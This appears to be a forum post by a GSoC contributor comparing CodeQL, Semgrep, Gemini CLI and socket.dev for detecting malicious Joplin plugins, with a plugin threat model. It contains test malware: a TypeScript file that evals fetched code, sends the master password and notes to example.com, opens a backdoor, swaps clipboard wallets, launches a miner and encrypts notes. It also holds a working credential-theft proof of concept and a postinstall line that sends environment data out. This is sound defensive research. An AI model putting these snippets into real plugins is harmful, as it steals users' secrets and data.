Plugin Security Tool Comparison -- CodeQL, Semgrep & Gemini CLI

akshajrawat · 30 May 2026 18:19

Hi, as part of my GSoC work I ran three static analysis tools across a set of Joplin plugins to see how well each one detects malicious behavior. Here's what I found.

The Tools

CodeQL is GitHub's semantic analysis engine. It's powerful but requires writing QL queries and building a database per repo - the highest setup cost of the three.

Semgrep is a pattern-based scanner that runs YAML rules against source code. It's the easiest to plug into a CI pipeline and the fastest to get running.

Gemini 3.1 pro preview CLI is Google's AI-assisted tool. It reads the code and produces a structured security report with a risk score and verdict. No custom rules needed.

TESTINGS :

Semgrep Scan — `joplin-plugin-jarvis`

No custom rules were written everything the scanner found out was on it own rules.

File	Rule	Line	Issue
`src/commands/chat.ts`	Non-literal RegExp	274	`new RegExp(nc, 'g')` — dynamic regex built from variable, vulnerable to ReDoS
`src/commands/chat.ts`	Non-literal RegExp	274	`new RegExp(prompt_override)` — same line, second dynamic argument flagged
`src/commands/notes.ts`	Unsafe format string	157	`console.debug(\`Skipping note ${noteId}`)` — variable in log string
`src/models/models.ts`	Unsafe format string	726	`console.info(\`Jarvis: Loaded ${this.embeddings.length}...`)` — variable in log string
`src/research/papers.ts`	Unsafe format string	296	`console.debug(\`Error processing paper ${i}`)` — variable in log string
`src/research/wikipedia.ts`	Unsafe format string	169	`console.debug(\`Error processing Wikipedia page ${i}`)` — variable in log string
`src/utils.ts`	Non-literal RegExp	182	`new RegExp(patterns.join(''), 'is')` — dynamic regex from joined array, vulnerable to ReDoS

OBSERVATION :
The "Unsafe format string" Findings are 100% false positives particaularly caused by javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring rules excluding them removed this alert.
The "Non-literal RegExp" makes the plugin vulnerable to ReDoS attacks, but that is also not something we are looking for in the plugin. This one is caused by the javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp rules.

After excluding both of these rules I ran the test again on plugin-conflict-resolution, but I added custom test malicious code on it :

File	Rule	Line	Issue
`src/vulnerabilities.ts`	`react-insecure-request`	17	Unencrypted request over HTTP detected (`axios.get('[http://malicious.com/code.js](http://malicious.com/code.js)')`).
`src/vulnerabilities.ts`	`eval-detected`	18	Detected the use of `eval()`. May be a code injection vulnerability.
`src/vulnerabilities.ts`	`react-insecure-request`	27	Unencrypted request over HTTP detected (`fetch('[http://malicious.com/steal-db](http://malicious.com/steal-db)')`).
`src/vulnerabilities.ts`	`react-insecure-request`	43	Unencrypted request over HTTP detected (`axios.post('[http://malicious.com/steal-notes](http://malicious.com/steal-notes)')`).
`src/vulnerabilities.ts`	`weak-symmetric-mode`	49	Weak cryptographic mode detected (`createCipheriv('aes-256-cbc')`). Recommend AES-256-GCM.
`src/vulnerabilities.ts`	`react-insecure-request`	68	Unencrypted request over HTTP detected (`fetch('[http://malicious.com/exfiltrate-export](http://malicious.com/exfiltrate-export)')`).

The scanner is still running on pure self rules, It did catch few of the things which it should catch but missed many. Here is the list of the things he missed :

Threat Category	Code / Attack Mechanism	Scanner Status	Why it happened
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Caught	Flagged by `react-insecure-request`. The scanner correctly identified unauthorized HTTP network traffic.
Remote Code Execution	`eval(remoteCode.data)`	Caught	Flagged by `eval-detected`. The scanner knows that executing dynamic strings is a massive security risk.
System Command Execution	`child_process.exec('curl... bash')`	Missed	Default Node.js rulesets ignore this because legitimate backend web servers use it all the time.
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed	Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders.
Network Backdoor	`net.createServer(...)`	Missed	Standard Node web apps create servers, so the tool assumes it is safe behavior.
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed	The scanner has no knowledge of Joplin's custom API or what `joplin.data.put` does.
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed	The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods.

These observation shows exactly 2 things :

Semgrep is completely unaware of what the Joplin API's are.
Semgrep is completely unaware of that the code he is scanning is of a plugin. It is written in ts/js but it should not do everything that a standard node.js code does like - fs.readFileSync & fsExtra.removeSync (reading and deleting files) , child_process.exec('curl... bash') (run system command), etc. But even if they do so for a good reason, it should be flagged once so the human reviewer can check whats it actually doing.

CodeQLScan — `joplin-plugin-jarvis`

Similarly for CodeQL no custom rules were written it is doing exactly what it is made to do

File	Rule	Line	Issue
`models/openai.ts`	Incomplete URL substring sanitization	19	`'azure.com'` can be anywhere in the URL, and arbitrary hosts may come before or after it.
`models/openai.ts`	Incomplete URL substring sanitization	26	`'api.anthropic.com'` can be anywhere in the URL, and arbitrary hosts may come before or after it.
`utils.ts`	Bad HTML filtering regexp	374	This regular expression does not match script end tags like `</script>`.
`research/pubmed.ts`	Double escaping or unescaping	381	This replacement may produce `&` characters that are double-unescaped.
`research/wikipedia.ts`	Incomplete multi-character sanitization	125	This string may still contain `<script`, which may cause an HTML element injection vulnerability.
`utils.ts`	Incomplete multi-character sanitization	373	This string may still contain `<style`, which may cause an HTML element injection vulnerability.
`utils.ts`	Incomplete multi-character sanitization	373	This string may still contain `<script`, which may cause an HTML element injection vulnerability.

RESULT : Keeping it short, CodeQL gave better findings than Semgrep. But every result it gave except the model/ folder were XSS, which is explicitly stated by laurent that we are not looking for.
The two findings in the model/ folder were of SSRF which can be usefull as a user can trick the app by adding 'azure.com' and 'api.anthropic.com' in a custom malicious url.
Though it is not something particularly "Malicious" in the Jarvis plugin so not usefull for us.

After excluding the XSS and SSRF rules from the CodeQl original rules, I ran the test on plugin-conflict-resolution, but with added custom test malicious code on it :

File	Vulnerability	Line	Issue
`lib/codemirror/mode/markdown/markdown.js`	Inefficient regular expression	549	This part of the regular expression may cause exponential backtracking on strings starting with 'a -=' and containing many repetitions of '= -='.
`vulnerabilities.ts`	Download of sensitive file through insecure connection	17	Download of sensitive file from HTTP source.

"Inefficient regular expression" is also a ReDoS case which we are not actually looking for.
Hence, out of all the added code, CodeQl falgged :

Threat Category	Code / Attack Mechanism	CodeQL Status	Why it happened
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Missed	CodeQL did not recognize the outgoing POST/GET requests as unauthorized data leaks.
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught	Flagged as "Download of sensitive file through insecure connection". CodeQL caught the dangerous HTTP download, though it ignored the `eval()` itself.
System Command Execution	`child_process.exec('curl... bash')`	Missed	Default Node.js rulesets ignore this because legitimate backend web servers use it all the time.
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed	Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders.
Network Backdoor	`net.createServer(...)`	Missed	Standard Node web apps create servers, so the tool assumes it is safe behavior.
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed	The scanner has no knowledge of Joplin's custom API or what `joplin.data.put` does.
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed	The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods.

These observation also shows exactly 2 things :

CodeQl is completely unaware of what the Joplin API's are.
CodeQl is completely unware of that the code he is scanning is of a plugin and should not do everything that a normal TS/JS code should do

Further architecture analysis :

Any Joplin plugin can call joplin.settings.globalValues() with no restrictions and retrieve all sync credentials, the E2E master password, and the API token , using only the official plugin API, with zero exploits or sandbox escapes.

import joplin from "api";

joplin.plugins.register({
  onStart: async function () {
    const result = joplin.settings.globalValues([
      "sync.5.password",
      "sync.6.password",
      "sync.8.password",
      "sync.9.password",
      "sync.10.password",
      "encryption.masterPassword",
      "api.token",
      "encryption.passwordCache",
    ]);

    joplin.data.post(["notes"], null, {
      title: "test note for hacker",
      body: JSON.stringify(await result),
    });
  },
});

Additionally, the dev can get access to both the security key and master password :

First I used joplin.data.get(['master_keys']) which is a defined method to get the master_keys, but this was blocked by a regex filter that does not allow "_" in it :

for (const p of path) {
    if (!this.pathSegmentRegex_.test(p)) {
          throw new Error(`Path segments must only contain lowercase letters and digits: ${JSON.stringify(path)}`);
     }
}

So, I used "syncInfoCache" and it worked and I got the key + master_password.

Joplin settings and plugins I believe currently work on the thinking that "If a user has installed a plugin he trust it", i.e the plugin gets access to all the settings defined. Since, we are moving from a trust-by-default to a review-by-default model, It will be good to have a flag about this specific bypass.
A plugin can read the secret and pipe it down through a network request silently without the user ever even knowing or it can even read both key and password of the user.

Update to threat model :

What it is: The plugin attempts to read or extract the application's Master Password, Master Encryption Keys, or Sync Target Credentials regardless of the API path used. Because plugins operate in a trusted environment, extracting these assets constitutes a compromise of the user's privacy and must flagged for review.

Known Attack Vectors:

Calling joplin.settings.globalValue or globalValues explicitly targeting "syncInfoCache" , "encryption.masterPassword" , "sync.*.password", "api.token" , "encryption.cachedPpk" , "encryption.passwordCache", should be once flagged for review.
Additionally if the data is read and piped down to a network request, saved silently to a note, written to the local file system, passed to a system command (child_process), or injected into an external webview, it should be marked as critical and a must-review case.
If both "encryption.masterPassword" and "encryption key" are being fetched by a plugin it should also be marked for a review.

Threat Model :

All of the above observation shows the exact need of writing custom rules for the tool and defining a threat model, using which the tools would know what we have to detect.
Since, human review is the mandatory part of the pipeline we have to write a threat model that covers both "This is bad" and "This may be bad" scenarios, so the reviewer know what he has to review.
Tools by themselves do not know what a person want to see in there code flagged out. Using the custom rules / threat model, we will tell the tool, we want to see these things flagged out so that the human reviewer can read the report in the issue and have a quick check on it.
Following is the threat model that I have defined till now with the exact reason why each of the things should be flagged :

(This model is actively under development and new things are being added and old ones are being updated regularly)

Phase 1: Critical Threats

Dynamic Code Execution: The plugin downloads a hidden script from the internet and executes it dynamically. Attack Vectors: Usage of eval() or bypassing joplin.require to use native require('child_process') with remote payloads.
Secret & Key Theft: The plugin attempts to read the application's Master Password, Encryption Keys, or Sync Credentials. Attack Vectors: Calling joplin.settings.globalValue(s) targeting syncInfoCache, encryption.masterPassword, encryption.cachedPpk, encryption.passwordCache, sync.*.password, sync.*.auth, sync.*.context, sync.5.username, sync.6.username, sync.9.username, sync.10.username, sync.10.userEmail, sync.userId, or clientId. This is critical if the data is piped to a network request, written to disk, passed to child_process, or injected into an external webview.
Electron Main Process Takeover: Gaining direct access to the main Electron process to control the app window or bypass renderer restrictions. Attack Vectors: Any import or requirement of @electron/remote.
Archive Extraction Attack : Using maliciously crafted zip files to overwrite sensitive files outside the intended directory, silently replacing database.sqlite or config files. Attack Vectors: Usage of joplin.fs.archiveExtract() where either argument originates from user input or a remotely fetched source. This should be flagged for a reviewer to see what the zip extraction is actually doing?
Mass Data Destruction & Silent Corruption : Iterating through notes/folders to permanently destroy the database, or silently corrupting note content (e.g., word replacement, date shifting). Attack Vectors: joplin.data.delete() inside loops, or joplin.data.put() modifying note body text. The scanner must track execution queues or detached background workers (e.g., arrays populated in UI event hooks but processed later) designed to evade direct flow analysis.
Keylogging & Silent Surveillance: Silently monitoring everything a user reads or types in real-time and exfiltrating it. Attack Vectors: onNoteContentChange or onNoteChange combined directly with network requests (fetch, axios).
Unauthorized FS Access & Self-Modification: Bypassing official APIs to read/rewrite core configs (database.sqlite), or rewriting its own source files after installation to swap code for malware. Attack Vectors: Usage of native fs or joplin.require('fs-extra') targeting __dirname + '/index.js' or ~/.config/joplin-desktop.
Network Backdoors: Opening a listening port on the user's local network. Attack Vectors: Usage of net.createServer().
Clipboard Hijacking: Rapidly reading the clipboard to find sensitive data + swapping it. Attack Vectors: Background loops calling joplin.clipboard.readText() and joplin.clipboard.writeText().
Native Binary & Cryptojacking: Dynamically downloading/unpacking compiled binaries, spawning miners, or using Web Workers for crypto-mining. Attack Vectors: Exploiting Node.js integration via child_process or hidden BrowserWindows.
Native Module Imports : Bypassing the joplin.require() API to gain full host machine access. Attack Vectors: Direct imports of child_process, net, os, dgram via require(), window.require(), or TypeScript import statements.
Silent Data Persistence & Sync Smuggling : Storing execution commands, or using the user's sync target as a stealthy exfiltration channel. Attack Vectors: Reading joplin.data.userDataSet() and excecuting data got from it, or reading joplin.data.get(['notes']) and copying the contents into a note's invisible userDataSet.
UI Phishing & Credential Harvesting: Mimicking official Joplin or general authentication dialogs to steal user credentials. Attack Vectors: Usage of joplin.views.dialogs.setHtml or joplin.views.panels.setHtml containing <input type="password"> or fake branding. This is a critical threat if the resulting formData is piped to a network request.
Resource Exhaustion & Quota DoS: Intentionally degrading database performance or exhausting disk/cloud storage quotas. Attack Vectors: Asynchronous loops generating massive amounts of junk entities like joplin.data.post(['tags']) or generating large binary resources via fs.writeFileSync. The scanner must flag infinite loops utilizing setInterval, setTimeout, or recursive Promise-based sleep utilities.

Phase 2: Dual-Use Data Flows

Command Execution: Running terminal commands via child_process. Attack Vectors: Data flowing into shell execution. The reviewer must verify if it is a legitimate tool or a malicious script.
Data Exfiltration: Using joplin.data.get to bulk-read notes and piping that data into fetch() or axios. Attack Vectors: Note data flowing to network. The reviewer must verify the destination URL.
Mass Encryption / Ransomware: A flow combining note reading, cryptographic modules, and overwriting the originals. Attack Vectors: joplin.data.get piped to joplin.data.put via crypto. The reviewer must verify if this is just a encryption feature or not.
Silent Backup Hijacking: Registering a custom export format while secretly piping the plaintext data to an external server. Attack Vectors: fetch() or network requests inside a joplin.interop.registerExportModule callback.
Malicious Import Module: Registering a custom import format that injects malicious notes, corrupts the database, or drops payload files. Attack Vectors: Malicious payloads inside a joplin.interop.registerImportModule callback.
Remote Webviews & Side-Channel Requests: Creating a UI panel explicitly tied to an external URL, or dynamically injecting user data in the url to bypass network monitoring. Attack Vectors: <iframe src="..."> in panel HTML, or injecting <img src="..."> where the URL path contains encoded user data or credentials.

False Positive:

Several Phase 2 items are dual-use by nature and will flag legitimate plugins (e.g., child_process for Python integrations, fetch + data.get). This is intentional. Phase 2 exists precisely because human review is mandatory. The LLM scanner is prompted to consider context before flagging, reducing noise compared to rule-based tools.

Note : This threat model mostly contain of data flows, that is why now it is not possible to define any custom rules in semgrep for this, I have given a small study at last of the SAST section to specifically test why semgrep cannot be used anymore
Also few new threats were added after the initial testings so the test below are done on a little less threat model coverage

Here is the report CodeQl gnerated on `plugin-conflict-resolution` with custom malicious code :

Vulnerability / Rule	Description	Severity	File	Position (Line:Col)
Unauthorized Native Module Bypasses	Detects direct imports of 'child_process', bypassing the safe 'joplin.require' method.	warning	`/vulnerabilities.ts`	2:8 - 2:25
Network Backdoors	Detects local servers being spun up which may indicate a backdoor.	warning	`/vulnerabilities.ts`	30:20 - 33:6
Data Exfiltration (Notes to Network)	Detects Joplin notes data flowing to external network requests.	warning	`/vulnerabilities.ts`	43:58 - 43:62
Direct File System / Sandbox Escape	Detects hardcoded sensitive paths or traversals flowing into file system APIs.	warning	`/vulnerabilities.ts`	26:36 - 26:41
Secret and Key Theft	Detects sensitive environment variables or settings data exfiltrated via network requests.	warning	`/vulnerabilities.ts`	22:17 - 22:65

CodeQL generated a good report + also was able to catch cross file code and gave exact lines to look for. The threat model seems to work great as it enhanced the codeQL result a lot :

Threat Category	Code / Attack Mechanism	Status
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Caught
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught
System Command Execution	`child_process.exec('curl... bash')`	Caught
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Caught
Network Backdoor	`net.createServer(...)`	Caught
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Caught
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Caught

(It returned clean for jarvis)

RESULT :

CodeQl gave good result when was defined what he has to look for. Though as earlier seen Codeql was not able to identify most of the things we want to see without the custom rules, this means that it is now bound to the "threat model" to generate the report so the only things which we will mostly see in the report are of the "threat model", leaving a huge Zero-Day Blind Spot.

LLM as a scanner :

LLM would be a great tool to use here, as the main problem arising with tools are lack of context of what actually a "joplin plugin api" is and the need for defining a "threat model" to write custom rules for.
As many joplin plugins are made by the community developers, although the "threat model" can be defined, but in future new and new things that a reviewer would want to see in the report will arise.
LLM is not bound to any rule or threat model, although "threat mode" will be prompted, LLM are also actively good enough to report zero day malicious code.

The scan result from gemini 3.1 pro preview with threat model defined on joplin-plugin-jarvis :

The scan result from gemini 3.1 pro preview with threat model defined on plugin-conflict-resolution with custom malicious code :

Threat Category	Code / Attack Mechanism	LLM Status
Data Exfiltration	`joplin.data.get` -> `axios.post()`	Caught
Remote Code Execution	`axios.get()` + `eval()`	Caught
System Command Execution	`child_process` (`curl... bash`)	Caught
Secret & Key Theft	`process.env` -> `fetch()`	Caught
Sandbox Escape / File Access	`fs` (SQLite) / `fs-extra` (absolute)	Caught
Network Backdoor	`net.createServer().listen(1337)`	Caught
Joplin API: Ransomware	Read -> `crypto.createCipheriv` -> Put	Caught
Joplin API: Malicious Interop	`registerExportModule` -> `fetch()`	Caught

The "threat model" seems to be working correctly, the well known joplin-plugin-jarvis which is not malicious was not flagged malicious, the use of fetch() after joplin.notes.get was flagged so a human reviewer can just check if there is nothing wrong.
Additionally, the LLM is not bound to only the threat model. It effectively looks the code and see if there is something that should be flagged, similar to the threat model defined.

More observations :

Why these tests were done?

To verify is the threat model generating any noise? If yes is it usefull and should be added in the threat model?
Additionally, LLM was used to scan + see if there is any flow that a plugin use which should be added to the threat model.

The most popular 4 plugins all passed the LLM and CodeQl scan with a clean result :
Note : The LLM was free to also look for similar malicious code pattern as the threat model

joplin-inline-todo Clean
joplin-rich-markdown Clean
plugin-templates Clean
plugin-yesyoukan Clean

CodeQl produced a little noise on plugin-templates :

Issue / Rule	Severity	File Location	Description
Useless regular-expression character escape	Error	`/parser.ts` (Line 211, Col 48, Col 63)	The escape sequence `\S` is equivalent to just `S`. Prepending a backslash to an ordinary character in a string does not have any effect.

This is a code quality finding due to the "*useless-regexp-character-escape*" rule, which is now excluded from the rules.
Tests :
joplin-math-mode Clean
joplin-note-tabs Clean
joplin-plugin-extra-editor-settings Clean
joplin-plugin-quick-links Clean
joplin-inline-tags-plugin Clean
joplin-plugin-combine-notes Clean
joplin-plugin-diff-tool Clean
joplin-plugin-table-formatter Clean

New updates to threat model after these testings :

Self-Modifying Code / Silent Payloads : What it is: The plugin uses fs or fs-extra to rewrite its own source files (e.g., overwriting __dirname + '/index.js') after installation to swap code for malware, bypassing initial CI scans.
Cryptojacking / Resource Theft : What it is: Exploiting Node.js integration to use child_process to spawn native mining binaries , or utilizing Web Workers in the hidden BrowserWindow to run crypto-miners in the background.

Now I had all the rules written. I made a file containing dummy code of all the rule senarios to check out how both codeql and LLM would perform :

import joplin from 'api';
import * as child_process from 'child_process';
import * as net from 'net';
import * as crypto from 'crypto';

const fs = joplin.require("fs-extra");

export async function codeql_test_dynamic_code_execution() {
    const response = await fetch('https://example.com/payload.js');
    const payload = await response.text();
    eval(payload); 
}

export async function codeql_test_secret_theft() {
    const masterPassword = await joplin.settings.globalValue('encryption.masterPassword'); 
    const syncCache = await joplin.settings.globalValue('syncInfoCache');

    await fetch('https://example.com/exfiltrate', {
        method: 'POST',
        body: JSON.stringify({ p: masterPassword, s: syncCache })
    });
}

export async function codeql_test_unauthorized_fs_access() {
    const pluginDir = __dirname; 
    const targetFile = `${pluginDir}/index.js`; 
    fs.writeFileSync(targetFile, "console.log('malware swapped');"); 
}

export async function codeql_test_network_backdoors() {
    const server = net.createServer((c) => { 
        c.write('backdoor active\r\n');
    });
    server.listen(8124); 
}

export async function codeql_test_clipboard_hijacking() {
    const clipContent = await joplin.clipboard.readText(); 
    if (clipContent.includes('wallet')) {
        await joplin.clipboard.writeText('attacker_wallet_address'); 
    }
}

export async function codeql_test_cryptojacking() {
    child_process.exec('xmrig -o pool.minexmr.com:4444 -u wallet_addr'); 
}

export async function codeql_test_command_execution() {
    const userCmd = "ls -la";
    child_process.exec(userCmd); 
}

export async function codeql_test_data_exfiltration() {
    const notes = await joplin.data.get(['notes']); 
    await fetch('https://example.com/sync', {
        method: 'POST',
        body: JSON.stringify(notes) 
    });
}

export async function codeql_test_mass_encryption() {
    const notes = await joplin.data.get(['notes']); 
    for (const note of notes.items) {
        const cipher = crypto.createCipheriv('aes-256-cbc', 'key', 'iv');
        let encrypted = cipher.update(note.body, 'utf8', 'hex');
        encrypted += cipher.final('hex');
        await joplin.data.put(['notes', note.id], null, { body: encrypted }); 
    }
}

export async function codeql_test_backup_hijacking() {
        await joplin.interop.registerExportModule({
            format: 'custom',
            description: 'Custom Export',
            target: fs.Directory,
            isNoteArchive: false,

            onInit: async (context: any) => {
                const data = context.exportData; 
                await fetch('https://example.com/steal_backup', { method: 'POST', body: data });
            },

            onProcessItem: async (context: any, itemType: number, item: any) => {},
            onProcessResource: async (context: any, resource: any, filePath: string) => {},
            onClose: async (context: any) => {}
        });
    }

export async function codeql_test_remote_webviews() {
    const htmlContent = `<iframe src="https://example.com/remote_app"></iframe>`; 
    const view = await joplin.views.panels.create('panel_1');
    await joplin.views.panels.setHtml(view, htmlContent); 
}

Result :

#	Threat	Phase	Maliciousness	LLM Scan	CodeQL
1	Dynamic Code Execution	1	Critical	Caught	Caught
2	Secret & Key Theft	1	Critical	Caught	Caught
3	Unauthorized FS / Self-Modification	1	Critical	Caught	Caught
4	Network Backdoor	1	Critical	Caught	Caught
5	Clipboard Hijacking	1	Critical	Caught	Caught
6	Cryptojacking / Binary Dropping	1	Critical	Caught	Caught
7	Command Execution	2	High	Caught	Caught
8	Data Exfiltration (notes → network)	2	High	Caught	Caught
9	Mass Encryption / Ransomware	2	High	Caught	Caught
10	Silent Backup Hijacking	2	High	Caught	Caught
11	Remote Webview Scripts	2	Medium	Caught	Caught

Originally, only LLM caught all the threats. Codeql rule were extreamly useless and caught only (3/11) threats. Several changes had to be done to make Codeql catch all the threats.

Trade offs : CodeQl is not good enough to catch complex data flows like how data was extracted and converted to an object and then used JSON.stringify on. Here codeql actually lost the track of the data and did not knew the new object contains the data we are following.

What had to be done to solve it? : Several new rules were added and old rules were updated to simply check :

does data.get() and fetch appear in same function?
does data.get() + crypto call + joplin.data.put() happens in the same file?
fetch() or file write inside a registerExportModule callback
etc....

Though these rules solved the problem right now, I am sure there are still a lot of blind spots which are left in CodeQl.
Additionally, codeql also caught these extra things :

Threat / Finding	What it is
Weak Cryptography (CBC mode)	The code uses an outdated encryption algorithm mode (like AES-CBC) instead of modern authenticated encryption (like AES-GCM).
Insecure Network Traffic (HTTP)	The plugin is making network requests (fetching data or sending user info) over plain `http://` rather than secure `https://`.
ReDoS (Inefficient Regex)	Regular Expression Denial of Service. The code contains a poorly structured regex pattern that requires exponential time to evaluate certain complex strings.

All of these were code quality noise.

Additional test for Semgrep :

Click to expand

Ran semgrep on same test file :

Rule ID / Finding	Description / Threat
`eval-detected`	Detected the use of `eval()`. Potential code injection vulnerability.
`joplin-plugin-dynamic-code-execution`	Remote or dynamically-loaded data flows into dynamic code execution (RCE).
`joplin-plugin-master-password-access`	MANUAL REVIEW REQUIRED: Plugin reads the master encryption password.
`joplin-plugin-sync-cache-access`	MANUAL REVIEW REQUIRED: Plugin reads the sync info cache (encryption keys/sync metadata).
`joplin-plugin-secret-key-theft`	Sensitive Joplin credentials flowing to a network/file/process/IPC sink.
`joplin-plugin-unauthorized-fs-write`	A path derived from `__dirname` flows to a file write (Self-modification).
`joplin-plugin-network-backdoor`	A server created via `createServer()` flows to `.listen()` (Network port opened).
`joplin-plugin-clipboard-hijacking`	Data flows into `clipboard.writeText()` (Clipboard hijacking).
`joplin-plugin-command-execution`	Data flows into shell command execution. Requires review.
`joplin-plugin-cryptojacking`	A string matching known miners/mining pools flows into `child_process` (Cryptojacking).
`joplin-plugin-command-execution`	Data flows into shell command execution. Requires review.
`joplin-plugin-data-exfiltration`	Joplin note data read via `joplin.data.get()` flows to a network request.
`javascript.crypto.weak-symmetric-mode`	Detected the use of a weak cryptographic mode (`aes-256-cbc`).
`javascript.crypto.symmetric-hardcoded-key`	A secret is hard-coded in the application.
`joplin-plugin-ransomware`	Ransomware pattern: reads notes, encrypts them, and writes them back.
`joplin-plugin-ransomware-taint`	Encrypted data flows into `joplin.data.put()`.
`joplin-plugin-backup-hijacking`	Network or file write detected inside a `registerExportModule()` callback.
`joplin-plugin-remote-webview`	An external URL flows into a Joplin webview via `setHtml()`.

Semgrep caught everything.
How ? : Specifically, the rules written for it were not dynamic neither flow tracking, most of them were direct, like if you see eval report as it is a AST matching scanner. Since, the file was specifically written for testing it caught everything usefull. But using the same ruleset on normal pluggin will cause huge amount of noise. For example using semgrep rule on Jarvis :

File	Lines	What the code is actually doing
`src/chatPanel.ts`	94	Building the HTML for the main Jarvis chat input UI (`<div class="jarvis-chat-panel">`).
`src/commands/ask.ts`	30, 97, 127	Building HTML forms for the "Ask Jarvis" and "Edit with Jarvis" popup dialogs.
`src/commands/research.ts`	52	Building the HTML form for the "Research with Jarvis" dialog.
`src/models/models.ts`	1317	Injecting local CSS styles (`<style>`) for a preview window.
`src/ux/modelManagement.ts`	435	Calling a helper function `build_dialog_html` to render the model management UI.
`src/ux/panel.ts`	27, 51, 91	Building the HTML for the sidebar panels (showing related notes, search boxes, and progress bars).

They all are useless noises.
Similarly calling the codeql new rules on jarvis gave no noise.

Conclusion :

Since, the threat model is more of a data flow kind now, AST scanner tools like semgrep , sonarQube (primary code quality scanner), etc does not have ability to scan them. Even if extra complex peice of custom rules are written, the main trade off will be that they will be doing something they are not designed for, hence a huge blind spot will always be left for the senarious which are not kept in mind while writting the rules + they will produce a lot of noise on normal plugins too.

The tool which stand chance was CodeQl, after several tests I came to realize the same things as the above tools, even though it has ability of taint tracking, there will always be blind spots for the senarious not taken in mind while writting the rules.

The LLM performed well in all of these cases, not only it was accurate at scanning.. It seldomly warned me about new things which are potential warning too in the plugins.
I still beleive LLM would be a great call for use in this pipeline.

SCA TOOL (socket.dev) :

Snyk , Semgrep SCA and npm audit are just general CVE database scanning tools, as of this pipeline we need something which can actually check if the package is malicious or not.
The tool which is popular for this use case is socket dev.

The first thing I did was running the socket scan on top 10 plugins from the plugin website of joplin.
Why? : To determine the noise level and also previously, I have tested socket.dev using custom malicious postinstall etc but it did not gave any result because it works on official npm published package only.

One thing to keep in mind while veiwing these result is that there are 3 tier in socket.dev low, warn and critical. I have completely filtered out the low findings.

Here are the result on the top 10 plugins :

1. joplin-inline-tags-plugin :

Package	Version	Alert Type	Severity (Policy)
`fast-xml-parser`	4.2.5	`criticalCVE`	`warn`
`form-data`	2.3.3	`criticalCVE`	`warn`
`form-data`	2.5.1	`criticalCVE`	`warn`
`form-data`	4.0.0	`criticalCVE`	`warn`
`entities`	4.5.0	`obfuscatedFile`	`warn`
`immer`	7.0.15	`criticalCVE`	`warn`

2. joplin-inline-todo :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`
`handlebars`	4.7.8	`criticalCVE`	`warn`

3. joplin-math-mode :

Package	Version	Alert Type	Severity (Policy)
-	-	No alerts detected	-

The scan completed successfully and detected 0 alerts. The alerts object is entirely empty.

4. joplin-plugin-combine-notes :

Package	Version	Alert Type	Severity (Policy)
`form-data`	2.3.3	`criticalCVE`	`warn`
`form-data`	4.0.0	`criticalCVE`	`warn`
`form-data`	2.5.1	`criticalCVE`	`warn`
`entities`	4.5.0	`obfuscatedFile`	`warn`
`immer`	7.0.15	`criticalCVE`	`warn`

5. joplin-plugin-diff-tool :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`

6. joplin-plugin-extra-editor-settings :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`
`form-data`	4.0.1	`criticalCVE`	`warn`

7. joplin-plugin-jarvis :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`
`markdown-it`	14.2.0	`obfuscatedFile`	`warn`
`markdown-it`	14.2.0	`obfuscatedFile`	`warn`

8. plugin-templates :

Package	Version	Alert Type	Severity (Policy)
`handlebars`	4.7.8	`criticalCVE`	`warn`

9. plugin-yesyoukan :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`

10. joplin-plugin-quick-links :

Package	Version	Alert Type	Severity (Policy)
`fast-xml-parser`	4.2.5	`criticalCVE`	`warn`
`form-data`	2.3.3	`criticalCVE`	`warn`
`form-data`	4.0.0	`criticalCVE`	`warn`
`form-data`	2.5.1	`criticalCVE`	`warn`
`entities`	4.5.0	`obfuscatedFile`	`warn`
`immer`	7.0.15	`criticalCVE`	`warn`

Observation :

The result was full of false-positives, every result which was generated was a false positive.

entities : obfuscatedFile Appeared in 8/10 plugins - This is a machine-generated HTML character decoding lookup table. Socket.dev cannot distinguish between intentionally obfuscated malware and auto-generated data tables.

form-data : criticalCVE Appeared in 5/10 plugins - it is a dependency pulled in through @joplin/* packages.
Is there a way to silent it? : The only possible ways are either silent all packages one by one that can be pulled (not feasible) another is to add CVE and obfuscatedFile in ignored list, but then we won't get usefull info too (not feasible)

markdown-it : obfuscatedFile Flagged only in Jarvis - These are standard minified browser bundles. False positive

immer, fast-xml-parser , handlebars : criticalCVE - Known CVEs in older versions of packages. Also, these are not Joplin-specific and are of warn category. This is not something we are looking for neither they do us any good, also few of them are from @joplin/*.

Summary

Plugin	Alerts	False Positives
joplin-inline-tags-plugin	6	6
joplin-inline-todo	2	2
joplin-math-mode	0	0
joplin-plugin-combine-notes	5	5
joplin-plugin-diff-tool	1	1
joplin-plugin-extra-editor-settings	2	2
joplin-plugin-jarvis	3	3
plugin-templates	1	1
plugin-yesyoukan	1	1
joplin-plugin-quick-links	6	6
Total	27	27

Then I ran the test again on Jarvis with a new custom dependency :

"akshajrawat.utils": "^1.0.1",

that contained :

 "postinstall": "node -e \"require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)\""

No new result was found.

Conclusion :

